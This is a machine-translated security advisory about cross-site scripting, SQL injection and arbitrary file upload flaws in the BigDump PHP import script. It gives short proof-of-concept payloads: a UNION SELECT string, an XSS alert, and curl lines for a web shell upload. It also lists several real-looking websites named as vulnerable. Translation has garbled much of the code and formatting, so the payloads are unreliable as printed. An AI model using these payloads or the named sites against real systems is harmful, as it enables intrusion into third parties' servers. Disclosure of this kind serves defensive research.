Release date:
Updated on: 2012-4 4
Affected Systems:
Ozerov BigDump 0.29b
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56744
BigDump is a tool script developed by the German Alexey Ozerov in PHP to import mysql Data in batches.
BigDump 0.29b, 0.32b, and other versions have cross-site scripting, SQL injection, and Arbitrary File Upload vulnerabilities, attackers can exploit these vulnerabilities to steal Cookie authentication creden。, upload arbitrary files, access or modify data, and exploit other vulnerabilities in the underlying database.
<* Source: Ur0b0r0x
Link: http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/bigdump.php? Start = [SQL]
Http://www.example.com/bigdump.php? Start = [XSS]
The http://www.example.com/bigdump.php [File Upload]
# Expl0it/P0c ###################
Http://site.com/bigdump.php? Start = <SQL Vulnerability Path>
Http://site.com/bigdump.php? Start = <Xss Vulnerability Path>
Http://site.com/bigdump.php <Arbitrary Upload Path>
# Expl0it/P0c/upload ###############
Input $ ch = curl_init ("http://site.com/bigdump.php? Start = shell. php ")
Output $ ch = curl_init ("http://site.com/bigdump/uploads/shell.php ")
# Expl0it/P0c/SQL ###################
+ Union + select + 1, 2, 4, 5, 6, 7, 8, 9, 10 -- +
# Expl0it/P0c/Xss ###################
"> <Script> alert (String. fromCharCode (88,83, 83) </script>
# Vulnerability/C0de /###################
<Form method = "POST" action = "<? Php echo ($ _ SERVER ["PHP_SELF"]);?>? Action = step3 "enctype =" multipart/form-data ">
<Input type = "hidden" name = "MAX_FILE_SIZE" value = "$ upload_max_filesize">
<P> Dump file: <input type = "file" name = "dumpfile" accept = "*/*" size = 60 "> </p>
<P> <input type = "submit" name = "uploadbutton" value = "Upload"> </p> </form>
# Samples/Arbitrart_Upload/SQL/Xss ####################
Http://www.fs7a.net/vb/1/bigdump.php
Http://www.lis186.com/dump/bigdump.php
Http://bigw3.com/bigdump.php
Http://twin.skr.jp/bigdump/bigdump.php
Http://www.fs7a.net/vb/1/bigdump.php? Start = %
Http://www.lis186.com/dump/bigdump.php? Start = %
Http://bigw3.com/bigdump.php? Start = %
Http://twin.skr.jp/bigdump/bigdump.php? Start = %
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Ozerov
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.ozerov.de/bigdump/